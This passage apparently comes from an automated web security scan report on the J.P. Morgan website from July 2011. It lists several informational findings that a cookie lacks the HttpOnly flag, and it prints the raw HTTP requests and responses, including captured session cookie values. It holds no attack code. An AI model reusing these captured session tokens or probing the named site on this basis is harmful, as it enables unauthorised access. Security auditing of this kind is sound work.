Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:04 GMT
Server: Apache
Last-Modified: Mon, 21 Jul 2008 15:41:10 GMT
Accept-Ranges: bytes
Content-Length: 82
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.. ....eXR.........<,$QB;:)!...!.......,...... ....x.......1 ,{.>\...#<Pz$.;

11.282. http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_dottedline.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/thrd_subnav_dottedline.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/thrd_subnav_dottedline.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:03 GMT
Server: Apache
Last-Modified: Mon, 21 Jul 2008 15:41:10 GMT
Accept-Ranges: bytes
Content-Length: 469
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

..................................................................
...[SNIP]...

11.283. http://www.jpmorgan.com/images/ts/imgs/icon_arrow_up.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/imgs/icon_arrow_up.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/imgs/icon_arrow_up.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:04 GMT
Server: Apache
Last-Modified: Tue, 01 Feb 2005 21:07:34 GMT
Accept-Ranges: bytes
Content-Length: 80
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.. .....3f...!.......,...... ...'.. ... 03L....j.-_.........V=......V....;

11.284. http://www.jpmorgan.com/images/ts/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/js/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/js/global.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.2.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=jpmcglobal%2Cjpmorgan%3D%2526pid%253DJ.P.%252520Morgan%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am%2526ot%253DA; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:51 GMT
Server: Apache
Last-Modified: Mon, 27 Oct 2008 15:08:24 GMT
Accept-Ranges: bytes
Content-Length: 4569
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

//Track links using H-Code
function trackLinks(clientLogin,parentLink,reportSuite) {
   s.linkTrackVars="prop9";
   s.linkTrackEvents="None";
   s.prop9=parentLink;
   s.tl(this,'o',clientLogin);

...[SNIP]...

11.285. http://www.jpmorgan.com/pages/jpmorgan/am previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/am

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/jpmorgan/am HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.2.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%3D%2526pid%253DJ.P.%252520Morgan%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am%2526ot%253DA

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:51 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 39050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page
...[SNIP]...

11.286. http://www.jpmorgan.com/pages/jpmorgan/am/mediaboxarticles/WhyJPMAM previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/am/mediaboxarticles/WhyJPMAM

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:19:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/jpmorgan/am/mediaboxarticles/WhyJPMAM HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; ACE_COOKIE=R2666079405; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/mediaboxarticles/WhyJPMAM%2526ot%253DA

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:19:28 GMT
Date: Tue, 12 Jul 2011 16:07:50 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 31309

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.o
...[SNIP]...

11.287. http://www.jpmorgan.com/pages/jpmorgan/am/uk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/am/uk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/jpmorgan/am/uk HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:49 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 31146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page
...[SNIP]...

11.288. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/am/uk/press_office

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/jpmorgan/am/uk/press_office HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:58 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 119103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page
...[SNIP]...

11.289. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:19:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; s_cc=true; JpmcSession=c1pvTcxGWTNzphJy71VYBj1NTMvypGSGLFbgqlrsYYTL535L1LdT!-1750666501; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.1.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2975777359; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched%2526ot%253DA

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:19:28 GMT
Date: Tue, 12 Jul 2011 16:08:22 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 34411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<h
...[SNIP]...

11.290. http://www.jpmorgan.com/pages/jpmorgan/am/usa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/am/usa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:19:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/jpmorgan/am/usa HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; ACE_COOKIE=R2666079405; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=jpmcglobal%2Cjpmorgan%2Cjpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/usa%2526ot%253DA

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:19:28 GMT
Date: Tue, 12 Jul 2011 16:07:49 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 127892

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>J.P. Morg
...[SNIP]...

11.291. http://www.jpmorgan.com/pages/jpmorgan/clientlogon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/clientlogon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/jpmorgan/clientlogon HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorganchase.com/corporate/Home/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=c1pvTcxGWTNzphJy71VYBj1NTMvypGSGLFbgqlrsYYTL535L1LdT!-1750666501; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.4.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; ACE_COOKIE=R2975777359

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:09 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 30839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page
...[SNIP]...

11.292. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/investbk/solutions/fixedincome/fx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

11.293. http://www.jpmorgan.com/pages/jpmorgan/private_banking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/private_banking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:19:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/jpmorgan/private_banking HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; s_cc=true; JpmcSession=c1pvTcxGWTNzphJy71VYBj1NTMvypGSGLFbgqlrsYYTL535L1LdT!-1750666501; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.1.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2975777359; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Wed, 13-Jul-2011 16:19:28 GMT
Date: Tue, 12 Jul 2011 16:08:26 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 43740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page
...[SNIP]...

11.294. http://www.jpmorgan.com/script/jpmVideoPlayerHelper.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/jpmVideoPlayerHelper.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jpmVideoPlayerHelper.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
